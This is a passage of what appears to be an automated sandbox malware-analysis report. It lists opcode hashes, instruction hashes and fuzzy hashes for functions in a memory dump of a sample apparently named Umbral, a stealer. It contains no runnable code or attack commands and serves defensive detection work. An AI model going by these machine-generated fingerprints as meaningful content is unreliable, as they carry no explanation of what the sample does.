                                        • Opcode Fuzzy Hash: 2c5b7cf640bfe4a891a84743ac25659c06ab5272ee8d6a35ff7da57b7c88cd80
                                        • Instruction Fuzzy Hash: 83118B26D1C85E8DFAB4B26858116FE72D1FF893A1F840176D41EC3582EF3A690A0689
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 07e1b9d7bdaf4d70bfb8c300411392535ab4887ca01241cda6a0c42ea5cf51d6
                                        • Instruction ID: b442419ce8c63d4e15423e9168ccd983708a86fba63a76948c65ffd3bb1e1a04
                                        • Opcode Fuzzy Hash: 07e1b9d7bdaf4d70bfb8c300411392535ab4887ca01241cda6a0c42ea5cf51d6
                                        • Instruction Fuzzy Hash: 9E11C221A0C9474FDB99E768941566573E2FFA5384F1540B9D40CC7197DF78D8024384
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 457ad556d6d6f7aa2f048da4bd0485d2ea60b2528ff67ac50d1781fffe293cfb
                                        • Instruction ID: 6c3d3a98a44bf8f2a1e6aa83fe58bb39d9254033ce24a9eb3fdc7256e88f9e15
                                        • Opcode Fuzzy Hash: 457ad556d6d6f7aa2f048da4bd0485d2ea60b2528ff67ac50d1781fffe293cfb
                                        • Instruction Fuzzy Hash: 5E119E30A1CF064FEBB9A638445467972D2FF99740F64457DC00EC2280DF39E886A744
Memory Dump Source (shared by the 32 functions listed below)
• Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
Similarity
• API ID: (empty for all 32 functions)
• String ID: (empty for all 32 functions)
• API String ID: (empty for all 32 functions)
Functions, one per line as Opcode ID | Instruction ID | Instruction Fuzzy Hash (the Opcode Fuzzy Hash of every function below is identical to its Opcode ID and is not repeated)
• a2f2187f39ad4606374684e346a2dc769d6d3c8bec9d340e8bbe8c33d1f37ba1 | 23ab1146d440e8a0843ac1d517553042adfd4536c438b3e0b452754649f52e02 | 6001F531D0D99E5FE755AB3868580B97FA0FF66741F4401B6D40CC6193EF342A469249
• 5da1f0883097e05805ce8706fb72945ef412cfe86874b7bfbf597a5a23b4ad60 | 081240a016add5a647bca606eca2f06fb603d3cfaaafd61e4c5705c7300ef40d | 8C11E53190DA8D5FEB21AB7898040E97FB0FF56344F0001F7D408CB0A3DA7519158381
• 0ba72a636a5abb8cdd9cfd90c44ebfdfabeeca84f8b5e2cc41f1cfd067aa13c4 | 8adc61d5cb8acf887113e4ecc3e948dbbc1be4f18bdbeaadbe816918a20b3461 | DD11BF34A0894ECFDB88EF58C894AAA73F2FFA8701F145169D419C7259CB34ED52CB84
• 475100ab7748563af60814e1479086de3ecb0f11cd2aaaec06e71aa9c3cb89ef | b3f59d9dd7b6bb21091c6b3a593cd5b347a18d312c1712e2c84386283249c8b7 | 0601F53184D6C96FE756977898550E83FB0EF46214F0402E7E448CB0A3DA6919468351
• 395621e4f6c706565b882810288fc05959370d9b10234f2e2865f7e98f09d06f | 71e5133893295449fe0e1e9fe6729a32cd449a269aba33ddc225b2d99330d942 | 2F01F721B2CE151FA66CB52DA4494B673D0FBA9394B00007FE00EC36C7ED29A8464288
• 5ff8c761e2a8b0a5008e484a66161b87dcd4d73ea09a3a4e7db0e65ea3dc1f47 | af52b8db7287140adc963d5de26ea970426b56e19100dc432f85cb59c0811a74 | 1611CE3181DA8D9FD711AB6898144A9BFB0FF46344F4001E7D80CCB0A3EB392A55C781
• e0b2d1bf3d38f822517f5dfa1633b7e3008c51ea9878ee41730eb6f52200d863 | c1167ebef2c59bf80e7982281fc3a86b26348f3da54c36bb9d082b3a41ae6a8b | E801F52051EB8A0FE70AB73858585E53BE0EF86255F4801F7E048CB1D7EA2C9882C385
• f4640cc247ecf7c14eb37ff47f7c2e6946b1c1d737736562bdd3a11137101c9d | a36dc51e873c0f4d560d5ea3a6a4429c3f79a913543933d5e65da7366b4657e6 | 2001042090EA9A0FE395B73C84251783BE0DF9A7C0F4804BAD449CB2E3DD6558858356
• cfb0d1d67a28c9e4e9abab7811bbfc3a8a3ae25beffc90cdcdc9053bf4d17715 | 387fccb9ebdddad7b6d47bf03ff8a3c885cc02813b7bac3b88e5eb4a2943e1a7 | CC11E13180DA8D5FD712AB7498140E9BFB0FF46340F8400EBD84DCB0A2EA352A56C751
• c01899848dbe57a3f181d17a069746f95c6eb764602b5a7672b95976b3ee2f3a | e970d7bfab1e9b36fb74924d234818074ec1e6aaea310cd64a00c70b81aacb06 | 5601DE31A0CF098FD755EB1CC444AA6B7E1FF99764F00067AE409D7264CE72E9808BC2
• ff0dc6f6e78059e8ca0bf8ec58cde3f65c9ca16304702f6836ca61aa7cd65ac1 | 6444fedbe317812b7b616da59a1310e0443310315e64a007b0d466c092559688 | 3701283084DBC95FD703977498554E97FB0FF07210F9840EBE889CB0A3DA291696C351
• d06619a5097e1cba86055f2ca9e22dae0c21117fc95b3cfbbee0e1e9da1d7dd8 | 8ee765164698aca3c59bd5def02d9e6429b702083299c6182f230148611e37d5 | E801243184E6CA5FD742A7344C650E87FB0FF17250F4901EBD888CB093CA291A86C352
• 09e2c7439b6b7fdb867b72e9c162dfd6d01149850d68ee20e127b81c3f37d20f | 63b58ba0ff37d53d697df1d5359e201a0f77c57750927bc21064f4bdf97d029a | 6A014E32A0D94D4FDB04EA56AC405E577D4FF84378F04027AD80CC3180D7795455C741
• 9a34cd10ece789f7a425ecbea8d5dadb4b2ea91f67b6dd768f1671194de8f0d2 | ae2ab61f69822f55f72577d9574720ce76b625d94847cbf157f7dd4e3ec6937a | 45014720A0EA1A0FE398B73C941127937E0DF8E3C0F4404BED409CB2E3DE6599854356
• 5a46eb0f6f364610575d85f762747affeb709659b1be4f142fc4b4bcd640cbe5 | 00c6758dcf8f1a08435d962acdffa621f5bdc9063bbe2b0c26fdef9a483661ec | D301B122E0DB860FD78AA66944A41747BE1FF56204B2900FBD409CB2A3DEAC9C468316
• 91bb7d28289be56537d04781df16dcb88c47a24b864adab53c3c389788a36236 | 1ff97f14d21a038e07877487256d18acc26b902d1690fca4acb13af2242b04d7 | 4A01B561C0DA8E6FE746AB2C94682FD7FA0EF16284F4841F6D858CB0A3DE3429448345
• 0df3a87e446ff277caa30594b45f1f62c8ca68c9d3a5ccde88763ceb2eda23db | 042cc4b1a86d4dbad19ccc2a2f3b3f952b8fabeb9b2cd4188ac0fb8311e88ad0 | 06110320D1CB958DF769A36890493B6A7D06F15358F0844BCD4CA466D2CBBDB8C9C345
• d6ccb823f8ae06e455e28eff5f7402b3f5af1a061f06812bb3cbe68d62767838 | 6db562d6bb9c21463a2b34678785db5b9afd7382f2a37a73634b4fa85e400455 | B1F0BB7190EA0E5EFB48EA09EC17AF67794FB46374F04006DF44DC1192D775A863C255
• 929617723005aafbdba7da253d7eb8d92945e11794739847c65af01658c22086 | 572fd9c498c8b9342cd36a96adeee70349e6d7b7a585aca999af85aa3f8a18dd | BBF06D31718E099FD7A8FAAD948467272D2FBAC365B50027DD40DC3396DE76E842C740
• a0d2b9a454109e20b1e3b03d6d9a837cece14469b356ae591e24fa094381a0eb | 2dbe8cf319bbe7678904bebca579091a7cd0832e67a030802424f672179a2dbf | 8A01F431C1DA8A9FE745AB3898491EDBFB0FF06250F8402EBD408C71A6EF3969568751
• d5eba0eb00f3abe42db82076f62f74a8d3eeb54b8b24230fe47376a46f804187 | c3f6ce059d64510117984a4600470bd461e4570ecfdcdf78afa634d868a21d6b | ADF0DA30709C0E8FDAA4F71DD858A2973E6FFA935175902A6E40DC7265DF64DC81C781
• 3bb2bbc7477ae9ea0eb274e1b59d5738c0a3603ed60d8c3a4fd75479994e8826 | e04ece275829db101440fd30677da0bc996936087836638ff5049d516b5a1c4b | 95018F3150CB895FD786E728D4605A6BBE1FF89360F4405BEE489C72A2CB2599418786
• 18b6be94dfa9de09d3c962753a738339dfa60ed6db7ab8058df4facfe06a7978 | 2de51ec5b93425de817464877fa258615d78e1333361c34debb09bb6a7e35796 | B501F53290DB890FF321E62098255DA7BD1BB91260F44077AD0A58B1F1EE68650987D2
• a8f5709bd0f44305f1990aa848e1b28fd8444399c0979e66c8509f82626574ca | 9bcd2be81f02d4f533ff3b4582084260f2d26f83c230da4fee328937dca92880 | 54F0AF31E0891D9EDB90BB6894462FD7BE0EF58380F004176D418E3289DE3819014BC1
• 4d35ce9033ebf2625aebf92fdf989ffa8f836da2a2fa4543e1773fe96791e411 | 50eca1236e10701a487bd8e3386e0d8e2361ec2d78caad66c1d41f36ecd4de02 | 2F01246148F7C20FD3435BB889615823FF59D5B220B0E41DBD4C4CF0A3D14E894AC322
• 647cd3cfffbbf9498d8668ce55de425b16ff067b9fe35d95b77d3416e4e649b2 | d35b9823fc3ab90072dd3c14adbab0de9c7c9e573ebff91d16455a295716cbad | 29F0183192CA094EE754FB38940957EB6E0FF98355F440A7AA88DD3165FF38D5804685
• 8f0b5c94bff9b27b944bf67636f2e09c78e38c533929d1384f3948edde9d4ef3 | 2656cf05f20047e48a1dc3b43f0d13f6abeb49230b901a3addad639ac82d2229 | 1CF0F920A1C90ECFDE94FA2CC45992573E0FF68784B6449ACD40ECB2A5EA26EC46C704
• 7424542bc01e62dc3b42ad30c252317bc41cd7dca192911b2c23a7ffd1fd5dd6 | 3cadcb3fb4fbdf6973b83ebf076baf416e8d7ea75ba0aca60d3acf678af83942 | ECF0E231E09E1E9FD29AB62C549093132D0FF8E750B940979C40CC7285DE3ADC428380
• 16d929d4c98655925a1e4f1ce3e18235ade5275bed5367ec3ab287877681b3b6 | d2afaedb320532eb016e864d24549622658014ff8120c7d8b3e3c4f7bf929b40 | F7F08221F0C95A0FEAA8E66DB49467476D1FF88261B4401FAD40DC7195DA25CC858385
• 994be84e3607f2d1ca03e0323782ac2c8c08f6eb8c7e638c4a5a2ca032bd15e7 | 92b07fe40c14551928cc2e1256b8474977fc9c287b3ea18102fbf9d648f605df | 6AE02212F2C8060BF264759E28C96FE5285EFEC2A0F984137E41DC3286CE6868821289
• 82054e097334cac0c9b1971521b2cb92f932bae40d727ae9c7392ca81d15f334 | 94b1c3cfbd213e5d067e7020188308d4ab71768a907587b0f62596dfd5935ad3 | 8BF0BE41D4CAA60DFBF6616A24493BA7DC0AB11350F8815BAD88DC59E1DE1CF8C58389
• 0365c27591ae0b3c5ac059206f3f776c05596b3b8abe6a1b1b844dbe6705f8e4 | 9fa6277a04d71f8199978c1b19524ef5b6ec8d4a68778b9a114dcb0f9689dabb | 9DE0D871D4CB4C4FDB50BA69A8159D97BA4FB85394F040069E01DC3281D7359955C356
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 301f0838ce5e029193e08f8df441e86b4242526778ebf1834eaac0d2608532f1
                                        • Instruction ID: ef0124a32b7245f3998e41e5ed9ec692faa996d490b8a60ff9eceee9b8ecd359
                                        • Opcode Fuzzy Hash: 301f0838ce5e029193e08f8df441e86b4242526778ebf1834eaac0d2608532f1
                                        • Instruction Fuzzy Hash: 2CE04F01F2C9168DE154761C74492BD52C2FB842D0FD886B2D00EC71E6CE6D9842018A
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8009c6b3adfde4081285c23677560c21002c8e7141f1eafc4690deb6a08c40a4
                                        • Instruction ID: b7fb324b3522efe9017ef0fa541502d747b8d7e662f0977bc2af29340c1dc81f
                                        • Opcode Fuzzy Hash: 8009c6b3adfde4081285c23677560c21002c8e7141f1eafc4690deb6a08c40a4
                                        • Instruction Fuzzy Hash: 99E0C222F5A80A1DFA48B3B4681B1FEB295EFC4344FC15876E00DC2083CE2939010295
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 61a24cdf9e8e0fe3a13dd2d30a5567ceb5710846a66a5bd8fbab26ac6de67cc3
                                        • Instruction ID: 7ef1a4fce07468ae5225370a9e78b843fbbcd870b8b38f4eb6f72c5783308cc9
                                        • Opcode Fuzzy Hash: 61a24cdf9e8e0fe3a13dd2d30a5567ceb5710846a66a5bd8fbab26ac6de67cc3
                                        • Instruction Fuzzy Hash: EBE0C221FAA80E5DEA48B3B468165FDB255EF88340FC01832E10DC2083CE2935010195
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 77619b89dca25b1f64211a18318519eeea113227f436b29b4320dd66188c35bb
                                        • Instruction ID: 6ac2539234fc47dab1cfe379681feb5c8958af840f4a62d215ea6b7b72c7771b
                                        • Opcode Fuzzy Hash: 77619b89dca25b1f64211a18318519eeea113227f436b29b4320dd66188c35bb
                                        • Instruction Fuzzy Hash: E0E0EC71A0CA044F9748EA2C948D96B7FE5DBEC365F144B3FB44DD3271DA7086448789
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 01e9cb3e2d135eb0db6dc780765f20e68e8c223b1d2f45c610b960c49168d00f
                                        • Instruction ID: bf9aceeb4fee0d1015c0c3df67300e839302a58e25ca8615cf6eb20ffee2723a
                                        • Opcode Fuzzy Hash: 01e9cb3e2d135eb0db6dc780765f20e68e8c223b1d2f45c610b960c49168d00f
                                        • Instruction Fuzzy Hash: 13D09E33E5C9174DF698728874032FCF380FB85AB0F50517BD25FC14829E2AB41611CA
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 88454f291d54ae6750f23dfcef6e31ad0c98673bb4b3802a0fdda105953ffe4c
                                        • Instruction ID: 6722ab6cfd2ac6acd752ada1bf3644ccfc2cadba3ecba59277974cda7b4b7304
                                        • Opcode Fuzzy Hash: 88454f291d54ae6750f23dfcef6e31ad0c98673bb4b3802a0fdda105953ffe4c
                                        • Instruction Fuzzy Hash: 02D01221D28E1D4FDAB8BA7890453A671E0FB58314F400AA9D41AC3589DFB8A98583C5
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b1b70077d1032325b7c12ba2a83ab13dc98a9b9b52d8316ab73ad8a2d13d76f0
                                        • Instruction ID: 2cf440e83d6b085640613632febe64e159ce884f003b97284f6935d9d927713c
                                        • Opcode Fuzzy Hash: b1b70077d1032325b7c12ba2a83ab13dc98a9b9b52d8316ab73ad8a2d13d76f0
                                        • Instruction Fuzzy Hash: 1EE0C262C0EA8A0EEB51AA74A4696BCAFD1AB61B60F5401FAC444471A7DE38154B8605
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f80dcd417c1806b088a29832bec5425820fe8779aac7d4189cae18796a0c0536
                                        • Instruction ID: fa0c4c93b2a78f9bdf03f265f7f0174b794b10fc4a4b9248a8506a4afc707ac0
                                        • Opcode Fuzzy Hash: f80dcd417c1806b088a29832bec5425820fe8779aac7d4189cae18796a0c0536
                                        • Instruction Fuzzy Hash: 81D02B93C0EB864FD693E23450AD7B42BC0AFA3248F4401E6C8041B197D528140D8241
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5d84e707b01d11f6760bb39d357135f3e1b420fefd58b69c49fab9346994f2a5
                                        • Instruction ID: 0d9a93f4e5f60a1e995ccf645dcbde93596c433d4c0ba3bdb897867fb2a5b959
                                        • Opcode Fuzzy Hash: 5d84e707b01d11f6760bb39d357135f3e1b420fefd58b69c49fab9346994f2a5
                                        • Instruction Fuzzy Hash: E4D02B83C0DBC70EE741A73460597A86FC0AF61750F8401F5C4544B1ABED2C414E8645
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3b0bbfec86485a7a08747c16496336e8a351579d6ad56dd4ccfbc5a863e24edc
                                        • Instruction ID: 4b10f029e8f3cdd288524988d120dd1351aecfd19956b782810d35b1cb82556a
                                        • Opcode Fuzzy Hash: 3b0bbfec86485a7a08747c16496336e8a351579d6ad56dd4ccfbc5a863e24edc
                                        • Instruction Fuzzy Hash: 44D0127245C7094BC205AB54E4104DAB7A0FB883A4F400B3AE09E911A5DF6892858681
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7b66d635945d40963614229eec94c4c8ce3cf48aaf65e5091f1b06d60a58a9ba
                                        • Instruction ID: be19b9a179aa089c6120331898805252b88719506d57cf242b9babc9a247e7f9
                                        • Opcode Fuzzy Hash: 7b66d635945d40963614229eec94c4c8ce3cf48aaf65e5091f1b06d60a58a9ba
                                        • Instruction Fuzzy Hash: 61D05E3142CB094BD345EF14E4508DAB7A0FF84770F800B2EF06E861E5DF7492868686
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 85d69ad4163207f4275177bb1dff1313a3477025f6fcbcdefeac50f32e1f25ab
                                        • Instruction ID: 1add8815f916e54a093491afd81fce2aa4e493946989a7ba03325b1673878939
                                        • Opcode Fuzzy Hash: 85d69ad4163207f4275177bb1dff1313a3477025f6fcbcdefeac50f32e1f25ab
                                        • Instruction Fuzzy Hash: 7DD0A722C2D9054DD94A72754C920202580BA5931CFE50294D06C822D1E95C5442C206
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1534a440531b46fb8637d4e7e9ab46e1c21fa1dc1bf7fe904b34824917602d9c
                                        • Instruction ID: a17aeca4be262210f5a82fe0bde18e18adc98f7c89cad1fa7f5bd4ab404f45d0
                                        • Opcode Fuzzy Hash: 1534a440531b46fb8637d4e7e9ab46e1c21fa1dc1bf7fe904b34824917602d9c
                                        • Instruction Fuzzy Hash: 6DD0C971C48A0A4EDBA0AA54A4419E977A0FBA4750F90017AD02563256DF38564B8A44
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c3cc1f1a8117be45d61f37d10180197b30bc900aed4aee4a90ee1feda7138059
                                        • Instruction ID: 7c7392b7efc2ae44503de8f444738fee204d13ba236faa6cd1a8d704c48b585f
                                        • Opcode Fuzzy Hash: c3cc1f1a8117be45d61f37d10180197b30bc900aed4aee4a90ee1feda7138059
                                        • Instruction Fuzzy Hash: 7BC02B01F5C9190EE150310C3C010BC6382FBC4170F9007B3D00FC328DCC2D988201C6
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d1b5b74f50968a8750edb2a775f88039665b864a89b449f50cde9ff13edd93df
                                        • Instruction ID: d68690d2b4214094c1db541633df888466a28a6d085a0f0931815bc3f04ac938
                                        • Opcode Fuzzy Hash: d1b5b74f50968a8750edb2a775f88039665b864a89b449f50cde9ff13edd93df
                                        • Instruction Fuzzy Hash: 16C08C01B6C8190AE050210C38010BC5282BB841A0B9006B3D00AC2289C82D984201C6
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e86ee1cd28e4c9828bffb6a7ccb0542c0300719732a09a7e131c163d0388a9e0
                                        • Instruction ID: 9963ce3c6d2f1565501762dfbdf5db91ca88653ee6fd4a0a6c22c230f8723fb9
                                        • Opcode Fuzzy Hash: e86ee1cd28e4c9828bffb6a7ccb0542c0300719732a09a7e131c163d0388a9e0
                                        • Instruction Fuzzy Hash: EEC04C01B1C9194AE550655C78411BD5282A784560B9557B7D50AC22D9C96D989201C6
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b36c05e086d3606b957039c638f2d7ea02117c38f757803fc469a2e8f4ef728e
                                        • Instruction ID: feae7a5334e81aa06ff1456f03c16bd2c29a3824ac1fcf21a1c2568cf7c143e0
                                        • Opcode Fuzzy Hash: b36c05e086d3606b957039c638f2d7ea02117c38f757803fc469a2e8f4ef728e
                                        • Instruction Fuzzy Hash: F7C01262D1C8465FE6445A5874810E97391F761651F544629E44A43189EF3855478A44
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3813973fc91a8a80e693ec4bf0588aec602fe175248f12197ad5c9d7b7ff211a
                                        • Instruction ID: 05a4e6c663a912566afc3279898e506e8d74e83e9b07e95c0af85cac0f60d4f8
                                        • Opcode Fuzzy Hash: 3813973fc91a8a80e693ec4bf0588aec602fe175248f12197ad5c9d7b7ff211a
                                        • Instruction Fuzzy Hash: 41C02220A08C2C0E02A8B22E0808A3A00C2CBCC220B0802BBA00CC3288CC200C0203C0
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1b0dcd419502779a4fa5ce945bba19a2cc0883589b1c648c4dcade9b64bbc0f2
                                        • Instruction ID: 0bec73abf13f878feb4579ca4fa46fb64c91b5a11a417cda9c8b99abb685de6a
                                        • Opcode Fuzzy Hash: 1b0dcd419502779a4fa5ce945bba19a2cc0883589b1c648c4dcade9b64bbc0f2
                                        • Instruction Fuzzy Hash: C6C08013D5C5071DE694671CF0455FD27C0F7907B0FD80131D405D224ADD6C51874546
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 795ea67e8b3ca868f8222e4b850c6598d3beea81e87ce9e1b10892f7c41b00e2
                                        • Instruction ID: fae37e6d83c50e725f94bec42412d1c6992129b31b07125391384f2291c9af77
                                        • Opcode Fuzzy Hash: 795ea67e8b3ca868f8222e4b850c6598d3beea81e87ce9e1b10892f7c41b00e2
                                        • Instruction Fuzzy Hash: 63C0123242C9855BD341B700E4418EB7351FFD0700F801B39F05A4109AED69A6448682
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c8d1beb1fb2f6b0479a927a22aa67f79e5f956e9c12a25f5e507eae62de257ab
                                        • Instruction ID: 714b26bca1542c07f81d409c7b8391b6977be5ab152f441a9a0bc3818eb59f9d
                                        • Opcode Fuzzy Hash: c8d1beb1fb2f6b0479a927a22aa67f79e5f956e9c12a25f5e507eae62de257ab
                                        • Instruction Fuzzy Hash: 17C08C3082E9098ECA14B7294841054B190FF08284FC401B8E00CC2249E7AC9090534D
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e55a75ff9e19932f76e50e3618ba7705c9440b530d8c687fcbbdf5c1af5ca719
                                        • Instruction ID: 57a58751d1e558150b77014aa1d5b04b774e291868cf5167702df82b6ea96e90
                                        • Opcode Fuzzy Hash: e55a75ff9e19932f76e50e3618ba7705c9440b530d8c687fcbbdf5c1af5ca719
                                        • Instruction Fuzzy Hash: 87B01233A4D0094C9A10208474010FDF310F780176F900133D70D8200086A2142505D0
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
